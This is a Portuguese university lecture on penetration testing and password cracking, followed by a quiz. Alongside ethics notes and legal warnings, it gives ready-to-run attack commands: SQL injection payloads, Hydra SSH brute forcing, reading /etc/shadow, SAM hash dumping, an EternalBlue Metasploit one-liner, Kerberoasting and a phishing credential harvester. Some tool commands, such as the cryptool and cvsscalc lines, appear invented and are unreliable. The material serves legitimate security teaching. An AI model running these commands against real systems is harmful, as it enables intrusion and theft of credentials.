CÓDIGO DA DISCIPLINA: DEE345

SEGURANÇA DIGITAL - Aula 14

Prof. Jéfer Benedett Dörr

Departamento de Engenharias e Exatas - UFPR/Palotina

Docente de Segurança da Informação

Aula 14: Testes de Invasão, Hacking Ético e Quebra de Senhas

Objetivos de Aprendizagem

Compreender o papel e as responsabilidades éticas de um pentester.
Aplicar metodologias de pentest (OSSTMM, OWASP, NIST) em cenários reais.
Diferenciar tipos de teste (Black Box, Gray Box, Double Gray Box).
Executar ataques de quebra de senhas com ferramentas como John, Hydra, Ophcrack, Pydictor.
Entender criptoanálise e ataques de canal lateral com exemplos práticos.
Praticar habilidades em competições CTF e laboratórios práticos.
Explorar ferramentas avançadas (Burp Suite, Metasploit, CrackMapExec) e laboratórios Docker.

Ferramentas para Testes de Aplicações Web

Prática Guiada: Burp Suite

Configure o proxy:
Em Options → Proxy Listeners, certifique-se de que o Burp está escutando na porta 8080.
Aponte o navegador:
Defina o proxy HTTP para 127.0.0.1:8080 no seu navegador (Firefox/Chrome).
Intercepte uma requisição de login:
Em Proxy → Intercept ative o “Intercept is on” e envie o formulário de autenticação de uma aplicação de teste (ex: DVWA).
Modifique o payload:
No próprio Burp, altere o parâmetro `username=admin` para `username=admin' OR '1'='1` e clique em “Forward”. Observe a resposta no navegador.
Use o Repeater:
Clique com o direito sobre a requisição interceptada → “Send to Repeater”. No painel “Repeater”, ajuste outros payloads (XSS, SQLi) e envie até ver o efeito.
Scaneie automaticamente:
Com a requisição em Target → Site map, clique com o botão direito e selecione “Scan”, para o Burp identificar vulnerabilidades.

Dica: Combine análise manual (Repeater) com scanner automático para validar hipóteses e aprender os falsos-positivos.

Armitage: GUI for Metasploit

O que é: Armitage é uma interface gráfica (GUI) para o Metasploit Framework, que ajuda na descoberta de hosts, exploração de vulnerabilidades, pós-exploit e geração de relatórios, tudo de maneira visual e colaborativa.

Instalação rápida:
```
> sudo apt install armitage
```
Iniciar Metasploit e Armitage:
```
> sudo systemctl start postgresql
> msfdb init
> armitage
```
Armitage vai abrir em https://127.0.0.1:55553 ou em janela própria, conectando-se ao banco PostgreSQL usado pelo Metasploit.
Scan de Rede:
Na interface, clique em Hosts → Nmap Scan, escolha um range (ex: 192.168.1.0/24) e execute para descobrir máquinas ativas.
Exploração automática:
Selecione um host descoberto, clique em Attacks → Find Attacks, e o Armitage lista exploits recomendados conforme serviços detectados.
Pós-exploit e relatórios:
Após abrir um Meterpreter, use botões de “Interact” para navegar o sistema, capturar screenshots, gravar keylogs ou criar sessões pass-the-hash. Gere relatórios em Reporting → HTML Report.

Por que usar: Ideal para quem está aprendendo Metasploit, pois visualiza o fluxo de pentest, facilita treinamentos em equipe e acelera a prototipagem de cenários de ataque.

Por que Pentest e Quebra de Senhas são Essenciais?

Em 2023, 80% das violações envolviam credenciais comprometidas (Verizon DBIR). Esta aula combina:

Metodologias estruturadas (OSSTMM, OWASP)
Ferramentas profissionais (Metasploit, Hashcat)
Técnicas de criptoanálise moderna

1. Hacking Ético e Pentest

Pentests simulam ataques autorizados para identificar vulnerabilidades, gerando relatórios com riscos e recomendações. O hacking ético exige autorização, confidencialidade e responsabilidade.

Responsabilidades e Ética

Escopo definido: Sistemas, horários, métodos permitidos (ex.: evitar DoS a menos que autorizado).
Contrato e NDA: Documento detalhando permissões, contatos e confidencialidade.
Entrega de relatório: Apenas para partes autorizadas, sem retenção de dados pelo pentester.
Não exploração indevida: Respeitar limites do escopo, evitando acesso não autorizado.

Exemplo prático: Um pentester descobre uma vulnerabilidade SQLi, mas só a explora até o ponto permitido no contrato, evitando acesso a dados sensíveis fora do escopo.

2. Metodologias de Pentest

OSSTMM: Foca em canais (físico, dados, comunicações). Exemplo:
```
nmap -sS -p- 192.168.1.100
```
Explicação: Varredura furtiva de portas para mapear canais de comunicação.
OWASP Testing Guide: Checklist para web (SQLi, XSS, autenticação). Exemplo:
```
sqlmap -u "http://alvo.com/login" --forms --batch
```
Explicação: Testa formulários web por injeções SQL.
NIST SP800-115: Framework para coleta e exploração. Exemplo:
```
nmap -sV -A --script vuln 192.168.1.0/24
```
Explicação: Varre vulnerabilidades conhecidas em uma sub-rede.
ISSAF & PTF: Scripts para automação. Exemplo:
```
git clone https://github.com/trustedsec/ptf
./ptf --update-all
```
Explicação: Atualiza ferramentas do Penetration Testing Framework.

3. Processo de Pentest

Planejamento: Definir escopo, assinar contrato/NDA. Exemplo de contrato (JSON):

{
  "scope": ["webapp.exemplo.com", "api.exemplo.com"],
  "excluded": ["vpn.exemplo.com"],
  "time_window": "2025-07-01T08:00/2025-07-01T18:00",
  "contacts": ["admin@exemplo.com", "sec@exemplo.com"]
}

Reconhecimento: Coleta passiva (OSINT, WHOIS) e ativa (Nmap, Gobuster).
```
gobuster dir -u http://alvo.com -w /usr/share/wordlists/dirb/common.txt
```
Explicação: Enumera diretórios web escondidos.
Enumeração e Exploração: Testes de vulnerabilidades (SQLi, XSS, força bruta).
```
sqlmap -u "http://alvo.com?id=1" --dbs
```
Explicação: Lista bancos de dados via SQL Injection.
Análise e Relatório: Quantificar riscos com CVSS, sugerir mitigações.
```
cvsscalc --base 8.3 --temporal 7.5
```
Explicação: Calcula pontuação CVSS para vulnerabilidades.
Entrega: Relatório entregue ao cliente, com Q&A e destruição de dados de teste.

Nota: Relatórios devem incluir data/hora, duração, analistas, escopo, resultados, margens de erro e anomalias.

Fluxo do Pentest

graph TD A[Planejamento] --> B[Reconhecimento] B --> C[Enumeração] C --> D[Exploração] D --> E[Pós-Exploração] E --> F[Relatório]

4. Tipos de Teste

Double Blind: Sem conhecimento mútuo, simula ataque real. Exemplo: Pentester usa OSINT sem informar cliente.
```
whois alvo.com
```
Explicação: Coleta informações públicas para iniciar ataque.
Gray Box: Conhecimento parcial, cliente informado. Exemplo: Credenciais de usuário básico fornecidas.
```
hydra -l user -P pass.txt http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
```
Explicação: Testa autenticação com credenciais limitadas.
Double Gray Box: Conhecimento parcial, cliente sabe do teste, mas não dos métodos. Exemplo: Simula insider threat.
```
crackmapexec smb 192.168.1.10 -u user -p pass --sam
```
Explicação: Enumera hashes SAM para escalação de privilégios.

5. Quebra de Senhas

5.1 Força Bruta e Dicionário

Força Bruta: Testa todas as combinações possíveis. Dicionário: Usa wordlists (ex.: rockyou.txt).

# Gerar wordlist numérica (5-8 dígitos)
crunch 5 8 0123456789 -o /tmp/numlist.txt

# John the Ripper
unshadow /etc/passwd /etc/shadow > pwdhashes.txt
john --wordlist=/tmp/numlist.txt pwdhashes.txt
john --show pwdhashes.txt

Explicação: Combina passwd/shadow e quebra hashes com wordlist.

5.2 Ferramentas

John the Ripper: Quebra hashes locais (Unix/Windows).
```
john --session=test1 --wordlist=/tmp/numlist.txt pwdhashes.txt
john --restore=test1
```
Explicação: Salva/restaura sessões de cracking.
THC-Hydra: Força bruta remota (FTP, SSH, HTTP, etc.).
```
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.50 -t 4
```
Explicação: Testa credenciais SSH com 4 threads.
Ophcrack: Usa tabelas rainbow para Windows.
```
ophcrack -g -t /path/to/vista_free
```
Explicação: Gera interface gráfica para cracking de hashes NTLM.
Pydictor: Gera wordlists personalizadas.
```
python pydictor.py -base L --len 6 8 -o pwdlist.txt
```
Explicação: Cria lista de palavras com letras minúsculas (6-8 caracteres).
Hashcat: Cracking acelerado por GPU.
```
hashcat -m 0 -a 0 -o cracked.txt hashes.txt /usr/share/wordlists/rockyou.txt
```
Explicação: Quebra hashes MD5 com wordlist.

5.3 Contramedidas

Senhas complexas (≥12 caracteres, letras, números, símbolos).
Salted hashes com bcrypt ou SHA-512.
Limitação de tentativas com PAM:
```
echo "auth required pam_faillock.so deny=3 unlock_time=600" >> /etc/pam.d/common-auth
```
Explicação: Bloqueia após 3 tentativas por 10 minutos.
Caracteres específicos (ex.: ç, ã) para dificultar dicionários.

6. Criptoanálise

Criptoanálise busca fraquezas em sistemas criptográficos sem a chave.

KPA (Known-Plaintext): Usa pares texto puro/cifrado.
```
cryptool --kpa --input encrypted.txt --plaintext known.txt
```
Explicação: Analisa relação texto puro-cifrado (demo teórica).
CPA (Chosen-Plaintext): Escolhe textos para análise.
```
cryptool --cpa --input cipher.bin --choose plaintexts.txt
```
Explicação: Testa comportamento do algoritmo com entradas controladas.
Side-Channel Attacks: Exemplo com tempo:
```
time openssl speed rsa2048
```
Explicação: Mede tempo de operações RSA para inferir chaves.
Colisões Hash: Usa SHAttered:
```
wget https://shattered.io/static/shattered-1.pdf
sha1sum shattered-1.pdf
```
Explicação: Demonstra colisão SHA-1 com PDFs idênticos.

7. CTFs e Prática

Hacker101: Tutoriais introdutórios.
```
open https://hackerone.com/hacker101
```
Explicação: Acesse desafios gratuitos para iniciantes.
TryHackMe: Plataforma interativa.
```
thm token set 
thm challenge list
```
Explicação: Configura acesso e lista desafios disponíveis.
HackTheBox: Requer VPN.
```
openvpn --config htb.ovpn
```
Explicação: Conecta à rede HackTheBox para desafios avançados.
Outras plataformas: VulnHub, PicoCTF, OverTheWire.
```
git clone https://github.com/vulnhub/vulnhub.git
```
Explicação: Baixa máquinas vulneráveis para prática local.

Desafio Prático: Quebre esta Senha

Tente decifrar o hash SHA-1: 7c4a8d09ca3762af61e59520943dc26494f8941b

Dica

Está na lista RockYou.txt

Solução

echo "7c4a8d09ca3762af61e59520943dc26494f8941b" > hash.txt
hashcat -m 100 hash.txt /usr/share/wordlists/rockyou.txt
# Resultado: 123456

8. Ferramentas e Técnicas Avançadas

Engenharia Social (SET): Simula ataques de phishing.
```
setoolkit
# Escolher: 1) Social-Engineering Attacks > 2) Website Attack Vectors > 3) Credential Harvester
```
Explicação: Cria página falsa para capturar credenciais.

Burp Suite Intruder: Força bruta em formulários web.

# Configurar proxy no Burp, capturar requisição POST, usar Intruder com wordlist
burp -Xmx2g -jar burpsuite_community.jar

Explicação: Automatiza ataques em formulários web.

Metasploit: Automação de exploração.
```
msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.1.5; run"
```
Explicação: Explora vulnerabilidade EternalBlue em SMB.

Kerberoasting: Explora tickets Kerberos em AD.

impacket-GetUserSPNs -request -dc-ip 192.168.1.10 dominio.local/user:pass > tickets.krb
hashcat -m 13100 tickets.krb /usr/share/wordlists/rockyou.txt

Explicação: Extrai e quebra tickets Kerberos para obter credenciais.

CrackMapExec: Enumeração em redes Windows.
```
crackmapexec smb 192.168.1.0/24 -u admin -p Passw0rd! --sam
```
Explicação: Enumera hashes SAM em múltiplos hosts.
Mini-Lab com Docker: Teste em aplicações vulneráveis.
```
docker run -d -p 80:80 vulnerables/web-dvwa
docker run -d -p 8080:8080 bkimminich/juice-shop
```
Explicação: Implanta DVWA e Juice Shop para prática de pentest web.
Hardening: Fortalecer sistemas.
```
echo "Port 2222" >> /etc/ssh/sshd_config
systemctl restart sshd
lynis audit system
```
Explicação: Altera porta SSH e audita segurança com Lynis.
Monitoramento: Detectar intrusões com Snort.
```
snort -i eth0 -c /etc/snort/snort.conf -A console
```
Explicação: Monitora tráfego em tempo real com regras personalizadas.

9. Gráfico de Exemplo

Visualização de vulnerabilidades encontradas por tipo:

⚠️ Alerta Legal

Testes sem autorização são crime no Brasil (Art. 154-A do Código Penal). Sempre obtenha:

Contrato assinado
Escopo documentado
Seguro de responsabilidade

Quiz de Avaliação – Aula 14

1. Qual comando gera uma wordlist numérica de 5 a 8 dígitos usando crunch?

crunch 8 12 0123456789 -o numlist.txt

crunch 5 8 0123456789 -o /tmp/wordlist-numeric.txt

crunch 5 8 abcdefghij -o numeric.txt

crunch 1 4 0123456789 -o numeric.txt

CORRETO! O comando crunch 5 8 0123456789 -o /tmp/wordlist-numeric.txt gera números de 5 a 8 dígitos.

INCORRETO. Deve usar 5 8 para comprimento mínimo e máximo, não outros valores.

2. Para um brute force SSH com Hydra, qual sintaxe está correta?

hydra -l root -P rockyou.txt telnet://192.168.0.100

hydra -l root -P rockyou.txt ssh://192.168.0.100

hydra ftp://root@192.168.0.100 -P rockyou.txt

hydra -L users.txt -p rockyou.txt ssh 192.168.0.100

CORRETO! A sintaxe hydra -l root -P rockyou.txt ssh://192.168.0.100 é correta para SSH.

INCORRETO. É necessário especificar o protocolo e a URL no formato ssh://IP.

3. Qual parâmetro do pam_faillock bloqueia contas após 5 tentativas falhas em 15 minutos?

deny=5

deny=5 fail_interval=900 unlock_time=600

maxretry=5

bantime=900

CORRETO! O conjunto deny=5 fail_interval=900 unlock_time=600 faz isso.

INCORRETO. É preciso definir deny, fail_interval e unlock_time.

4. Qual comando inicia o serviço auditd e habilita no boot?

sudo systemctl start auditd && sudo systemctl disable auditd

sudo systemctl enable --now auditd

sudo service auditd start

auditd --init

CORRETO! O comando systemctl enable --now auditd inicia e habilita o serviço.

INCORRETO. Para ativar no boot e iniciar, use enable --now.

5. Em Splunk ou Elastic SIEM, qual componente coleta logs de arquivos via forwarder?

router

forwarder (Filebeat/Universal Forwarder)

indexer

search head

CORRETO! O forwarder (como Filebeat ou Splunk UF) coleta e envia logs.

INCORRETO. O forwarder é responsável pela coleta, não o indexer ou search head.

6. Qual ferramenta permite capturar e analisar pacotes ARP para detectar spoofing?

dnsspoof

arpwatch

broadcast

arp-scan

CORRETO! O arpwatch monitora pares IP/MAC para detectar spoofing.

INCORRETO. Arp-scan faz varredura, mas arpwatch detecta mudanças ARP.

7. Qual comando lsof lista processos que escutam em portas TCP?

lsof -iUDP

lsof -iTCP -sTCP:LISTEN

lsof -i -P -n

lsof -i:22

CORRETO! `lsof -iTCP -sTCP:LISTEN` lista processos escutando em TCP.

INCORRETO. É preciso usar `-sTCP:LISTEN` para filtrar apenas listeners.

8. Qual ferramenta e comando iniciam um honeypot SSH com Cowrie?

git clone https://github.com/rapid7/cowrie.git

git clone https://github.com/cowrie/cowrie.git && bin/cowrie start

cowrie --install

docker run cowrie/cowrie

CORRETO! O repositório correto é `cowrie/cowrie` e o comando `bin/cowrie start` inicia o honeypot.

INCORRETO. É `git clone https://github.com/cowrie/cowrie.git` e depois `bin/cowrie start`.